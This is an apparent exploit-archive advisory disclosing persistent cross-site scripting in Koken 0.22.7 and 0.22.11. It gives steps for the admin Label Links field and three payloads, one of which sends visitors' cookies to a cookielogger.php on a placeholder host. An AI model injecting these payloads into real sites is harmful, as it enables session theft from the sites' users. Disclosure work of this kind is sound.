what you don't know can hurt you

Koken 0.22.7 / 0.22.11 Cross Site Scripting

Koken 0.22.7 / 0.22.11 Cross Site Scripting
Posted Nov 25, 2016
Authored by Taurus Omar

Koken versions 0.22.7 and 0.22.11 suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | f201c54b7bd9fdb3ce09213bca0ef1a5

Koken 0.22.7 / 0.22.11 Cross Site Scripting

Change Mirror Download
  ____        _           _____           
| _ \ | | / ____|
| |_) |_ _| |__ ___| (___ ___ ___
| _ <| | | | '_ \ / _ \\___ \ / _ \/ __|
| |_) | |_| | | | | (_) |___) | __/ (__
|____/ \__,_|_| |_|\___/_____/ \___|\___|


Document Title:
===============
Koken 0.22.7 & 0.22.11 Multiple Web Vulnerabilities

Credits & Authors:
==================
TaurusOmar - @TaurusOmar_ (taurusomar@buhosec.com) [taurusomar.buhosec.com]

Release Date:
=============
2016-24-11

Product & Service Introduction:
===============================

Built for photography: Your images are your most important asset. Koken treats them with the attention they deserve by including a full-featured management interface that looks and feels like a desktop application. Work and words, together: Write about portfolio updates, inspiration, or anything that comes to mind. Images, videos, slideshows and content from Flickr, Instagram, Vimeo, SoundCloud and Twitter are a snap to display.
Live site previewing and editing: Setup your navigation, add pages, and edit your site's color and layout with simple point-and-click controls. No HTML experience required.
Themes and plugins: Browse, select and install themes and plugins through an integrated store. Everything downloads and installs automatically to your Koken installation.



Abstract Advisory Information:
==============================
An independent researcher discovered multiple vulnerabilities in the official aplication My Koken 0.22.7 & 0.22.11

Vulnerability Disclosure Timeline:
==================================
2016-24-11: Public Disclosure

Discovery Status:
=================
Published


Affected Product(s):
====================
Koken - Creative website publishing
Product: Koken 0.22.7 & 0.22.11
http://koken.me/

Exploitation Technique:
=======================
Local


Severity Level:
===============
medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Koken 0.22.7
The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.
The vulnerability exists in the text box labels links in which injects the code is activated when the web server option to transfer


Request Method(s):

[+] Export

Vulnerable Module(s):

[+] Add Label Links

Vulnerable Parameter(s):

[+] Label Link Box


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


1. Add new user o use account admin
2. Go to path http://tusitio.com/koken/admin/#/site/draft/theme/url:/
3. On the menu Site > click to add Links/Footer or Links/Primary
4. In the section Label Links add you script
4. Successful reproduce of the persistent vulnerability!

Proof of Concept (IMAGES):
==========================

1. http://i.imgur.com/AAcFkwP.png
2. http://i.imgur.com/d7LuGLN.png

Vulnerability Code
=======================
<a data-bind="css: { 'front-page': $data.front && front }" class="item" href="#"><span class="in"><span data-bind="attr: { class: 'icon16 label-' + ($data.auto && $data.auto === 'rss' ? 'rss' : 'chain') }, text: label" class="icon16 label-chain">VULNERABILITY_CODE</span><span class="front-mark">(front<span class="front-hidden">&nbsp;/&nbsp;hidden</span>)</span></span></a>

PoC_1: Persistent Cross Site Scripting / Path / Footer
======================================================
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>

PoC_2: Persistent Cross Site Scripting / Path / Primaty
=======================================================
<script>alert(String.fromCharCode(88,83,83))</script>

PoC_3:Hijacking Vulnerability / Path/ Any
=======================================================
<script>document.location="http://www.tusitio.com/cookielogger.php?cookie=" + document.cookie;</script>


Security Risk:
==============
The security risk of the persistent input validation vulnerability in the name value is estimated as medium.
Login or Register to add favorites

File Archive:

July 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    12 Files
  • 3
    Jul 3rd
    1 Files
  • 4
    Jul 4th
    2 Files
  • 5
    Jul 5th
    34 Files
  • 6
    Jul 6th
    21 Files
  • 7
    Jul 7th
    21 Files
  • 8
    Jul 8th
    13 Files
  • 9
    Jul 9th
    6 Files
  • 10
    Jul 10th
    1 Files
  • 11
    Jul 11th
    3 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    19 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    15 Files
  • 16
    Jul 16th
    9 Files
  • 17
    Jul 17th
    2 Files
  • 18
    Jul 18th
    2 Files
  • 19
    Jul 19th
    19 Files
  • 20
    Jul 20th
    21 Files
  • 21
    Jul 21st
    53 Files
  • 22
    Jul 22nd
    14 Files
  • 23
    Jul 23rd
    14 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close